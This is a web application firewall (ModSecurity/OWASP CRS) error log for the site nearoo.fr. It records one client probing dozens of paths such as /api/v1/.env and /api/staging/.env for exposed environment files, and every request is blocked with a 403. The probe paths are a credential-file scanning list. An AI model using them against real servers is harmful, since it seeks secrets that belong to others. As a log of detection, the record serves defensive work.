[Mon May 11 16:54:25.738892 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/v1/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiRAAAAVI"]
[Mon May 11 16:54:25.739098 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/v1/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiRAAAAVI"]
[Mon May 11 16:54:25.739355 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/v1/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiRAAAAVI"]
[Mon May 11 16:54:25.966026 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/v2/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiRQAAAVI"]
[Mon May 11 16:54:25.966278 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/v2/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiRQAAAVI"]
[Mon May 11 16:54:25.966532 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/v2/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiRQAAAVI"]
[Mon May 11 16:54:26.227441 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/v3/.env"] [unique_id "agHtooW8yzYoWG_eyCWiRgAAAVI"]
[Mon May 11 16:54:26.227667 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/v3/.env"] [unique_id "agHtooW8yzYoWG_eyCWiRgAAAVI"]
[Mon May 11 16:54:26.227912 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/v3/.env"] [unique_id "agHtooW8yzYoWG_eyCWiRgAAAVI"]
[Mon May 11 16:54:26.387989 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/v1/.env"] [unique_id "agHtooW8yzYoWG_eyCWiSAAAAVI"]
[Mon May 11 16:54:26.388237 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/v1/.env"] [unique_id "agHtooW8yzYoWG_eyCWiSAAAAVI"]
[Mon May 11 16:54:26.388485 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/v1/.env"] [unique_id "agHtooW8yzYoWG_eyCWiSAAAAVI"]
[Mon May 11 16:54:26.627426 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/v2/.env"] [unique_id "agHtooW8yzYoWG_eyCWiSQAAAVI"]
[Mon May 11 16:54:26.627652 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/v2/.env"] [unique_id "agHtooW8yzYoWG_eyCWiSQAAAVI"]
[Mon May 11 16:54:26.627897 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/v2/.env"] [unique_id "agHtooW8yzYoWG_eyCWiSQAAAVI"]
[Mon May 11 16:54:26.857861 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/rest/.env"] [unique_id "agHtooW8yzYoWG_eyCWiSgAAAVI"]
[Mon May 11 16:54:26.858104 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/rest/.env"] [unique_id "agHtooW8yzYoWG_eyCWiSgAAAVI"]
[Mon May 11 16:54:26.858402 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/rest/.env"] [unique_id "agHtooW8yzYoWG_eyCWiSgAAAVI"]
[Mon May 11 16:54:27.104492 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/graphql/.env"] [unique_id "agHto4W8yzYoWG_eyCWiSwAAAVI"]
[Mon May 11 16:54:27.104706 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/graphql/.env"] [unique_id "agHto4W8yzYoWG_eyCWiSwAAAVI"]
[Mon May 11 16:54:27.104929 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/graphql/.env"] [unique_id "agHto4W8yzYoWG_eyCWiSwAAAVI"]
[Mon May 11 16:54:27.274235 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/gateway/.env"] [unique_id "agHto4W8yzYoWG_eyCWiTAAAAVI"]
[Mon May 11 16:54:27.274481 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/gateway/.env"] [unique_id "agHto4W8yzYoWG_eyCWiTAAAAVI"]
[Mon May 11 16:54:27.274723 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/gateway/.env"] [unique_id "agHto4W8yzYoWG_eyCWiTAAAAVI"]
[Mon May 11 16:54:27.399346 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/microservice/.env"] [unique_id "agHto4W8yzYoWG_eyCWiTgAAAVI"]
[Mon May 11 16:54:27.399560 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/microservice/.env"] [unique_id "agHto4W8yzYoWG_eyCWiTgAAAVI"]
[Mon May 11 16:54:27.399780 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/microservice/.env"] [unique_id "agHto4W8yzYoWG_eyCWiTgAAAVI"]
[Mon May 11 16:54:27.626310 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/service/.env"] [unique_id "agHto4W8yzYoWG_eyCWiUAAAAVI"]
[Mon May 11 16:54:27.626523 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/service/.env"] [unique_id "agHto4W8yzYoWG_eyCWiUAAAAVI"]
[Mon May 11 16:54:27.626754 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/service/.env"] [unique_id "agHto4W8yzYoWG_eyCWiUAAAAVI"]
[Mon May 11 16:54:27.760603 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/v3/.env"] [unique_id "agHto4W8yzYoWG_eyCWiUQAAAVI"]
[Mon May 11 16:54:27.760816 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/v3/.env"] [unique_id "agHto4W8yzYoWG_eyCWiUQAAAVI"]
[Mon May 11 16:54:27.761039 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/v3/.env"] [unique_id "agHto4W8yzYoWG_eyCWiUQAAAVI"]
[Mon May 11 16:54:27.957443 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/dev/.env"] [unique_id "agHto4W8yzYoWG_eyCWiUgAAAVI"]
[Mon May 11 16:54:27.957670 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/dev/.env"] [unique_id "agHto4W8yzYoWG_eyCWiUgAAAVI"]
[Mon May 11 16:54:27.957922 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/dev/.env"] [unique_id "agHto4W8yzYoWG_eyCWiUgAAAVI"]
[Mon May 11 16:54:29.246132 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/staging/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHFQAAAQI"]
[Mon May 11 16:54:29.246373 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/staging/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHFQAAAQI"]
[Mon May 11 16:54:29.247037 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/staging/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHFQAAAQI"]
[Mon May 11 16:54:29.572962 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/vendor/.env"] [unique_id "agHtpUWKUxpmnkK7zHyHFgAAAQI"]
